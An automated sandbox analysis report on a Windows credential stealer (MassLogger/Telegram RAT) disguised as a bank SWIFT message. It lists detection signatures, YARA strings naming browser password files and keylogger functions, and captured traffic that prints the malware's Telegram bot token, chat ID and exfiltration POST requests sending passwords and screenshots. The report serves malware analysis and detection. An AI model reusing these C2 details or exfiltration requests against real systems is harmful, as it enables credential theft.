Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat Bankasi Swift Mesaji.exe

Overview

General Information

Sample name:Ziraat Bankasi Swift Mesaji.exe
Analysis ID:1574076
MD5:00f8c8c1f90e631ebfbfcee425ef7bf7
SHA1:fcfa4abf5c184b4fd3df38d2980544c33dbcbd1d
SHA256:a9510229f4802ae23ce7e8606ec144245afacc864a8391e3c640e1da2ebd524a
Tags:exeMassLoggeruser-abuse_ch
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU", "Telegram Chatid": "8064644982"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xff69:$a1: get_encryptedPassword
        • 0x102a5:$a2: get_encryptedUsername
        • 0xfcf6:$a3: get_timePasswordChanged
        • 0xfe17:$a4: get_passwordField
        • 0xff7f:$a5: set_encryptedPassword
        • 0x1194f:$a7: get_logins
        • 0x11600:$a8: GetOutlookPasswords
        • 0x113de:$a9: StartKeylogger
        • 0x1189f:$a10: KeyLoggerEventArgs
        • 0x1143b:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Click to see the 18 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xe369:$a1: get_encryptedPassword
                • 0xe6a5:$a2: get_encryptedUsername
                • 0xe0f6:$a3: get_timePasswordChanged
                • 0xe217:$a4: get_passwordField
                • 0xe37f:$a5: set_encryptedPassword
                • 0xfd4f:$a7: get_logins
                • 0xfa00:$a8: GetOutlookPasswords
                • 0xf7de:$a9: StartKeylogger
                • 0xfc9f:$a10: KeyLoggerEventArgs
                • 0xf83b:$a11: KeyLoggerEventArgsEventHandler
                0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x13593:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x12a91:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x12d9f:$a4: \Orbitum\User Data\Default\Login Data
                • 0x13b97:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 30 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:38:48.037457+010020577441Malware Command and Control Activity Detected192.168.2.549711149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:38:38.072058+010028032742Potentially Bad Traffic192.168.2.549707193.122.6.16880TCP
                2024-12-12T21:38:45.892919+010028032742Potentially Bad Traffic192.168.2.549707193.122.6.16880TCP
                2024-12-12T21:38:49.799108+010028032742Potentially Bad Traffic192.168.2.549712193.122.6.16880TCP
                2024-12-12T21:40:39.017978+010028032742Potentially Bad Traffic192.168.2.550004193.122.6.16880TCP
                2024-12-12T21:41:02.318920+010028032742Potentially Bad Traffic192.168.2.550051193.122.6.16880TCP
                2024-12-12T21:41:18.017919+010028032742Potentially Bad Traffic192.168.2.550061193.122.6.16880TCP
                2024-12-12T21:41:29.680454+010028032742Potentially Bad Traffic192.168.2.550069193.122.6.16880TCP
                2024-12-12T21:42:17.207223+010028032742Potentially Bad Traffic192.168.2.550098193.122.6.16880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Ziraat Bankasi Swift Mesaji.exeAvira: detected
                Found malware configuration
                Source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU", "Telegram Chatid": "8064644982"}
                Source: Ziraat Bankasi Swift Mesaji.exe.768.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendMessage"}
                Multi AV Scanner detection for submitted file
                Source: Ziraat Bankasi Swift Mesaji.exeReversingLabs: Detection: 57%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Ziraat Bankasi Swift Mesaji.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49709 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49790 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49802 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49827 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49877 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49889 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49942 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49949 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49963 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49974 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49981 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50000 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50007 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50016 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50024 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50033 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50042 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50046 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50048 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50050 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50052 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50054 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50056 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50058 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50060 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50062 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50064 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50066 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50068 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50070 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50072 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50075 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50078 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50081 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50084 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50087 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50090 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50093 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50096 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50099 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50102 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50105 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50108 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50111 version: TLS 1.2
                Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 01115782h5_2_01115358
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 011151B9h5_2_01114F08
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 01115782h5_2_011156AF
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE1935h5_2_02BE15F8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEFD30h5_2_02BEFA88
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE2D98h5_2_02BE2AF0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BED4E0h5_2_02BED238
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEA518h5_2_02BEA270
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE3648h5_2_02BE33A0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEB678h5_2_02BEB3D0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEADC8h5_2_02BEAB20
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE4350h5_2_02BE40A8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE0B99h5_2_02BE08F0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEC380h5_2_02BEC0D8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEBAD0h5_2_02BEB828
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEE320h5_2_02BEE078
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE02E9h5_2_02BE0040
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE1449h5_2_02BE11A0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BECC30h5_2_02BEC988
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEF480h5_2_02BEF1D8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEEBD0h5_2_02BEE928
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BED93Ah5_2_02BED690
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEA970h5_2_02BEA6C8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEF8D8h5_2_02BEF630
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEA0C0h5_2_02BE9E18
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE3AA0h5_2_02BE37F8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEB220h5_2_02BEAF78
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE31F0h5_2_02BE2F48
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE0741h5_2_02BE0498
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEBF28h5_2_02BEBC80
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEE778h5_2_02BEE4D0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEDEC8h5_2_02BEDC20
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE3EF8h5_2_02BE3C50
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEF028h5_2_02BEED80
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BED088h5_2_02BECDE0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BEC7D8h5_2_02BEC530
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 02BE0FF1h5_2_02BE0D48
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then push 00000000h5_2_05414DC0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 054117FDh5_2_05411620
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 05412187h5_2_05411620
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 05410740h5_2_05410498
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 054102E8h5_2_05410040
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_05410B20
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 06E5A72Eh5_2_06E5A583
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then jmp 06E5A72Eh5_2_06E5A67D
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then push 00000000h5_2_06E58738
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_06E58738
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then push 00000000h5_2_06E5928E
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_06E59EAF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49711 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1ac31045a2d0Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1af3ce061effHost: api.telegram.orgContent-Length: 675713Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1b29bd449b72Host: api.telegram.orgContent-Length: 675713Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:849224%0D%0AFullDate:%2012/12/2024%20-%2015:38:35%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1b5f411f14c6Host: api.telegram.orgContent-Length: 675713Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%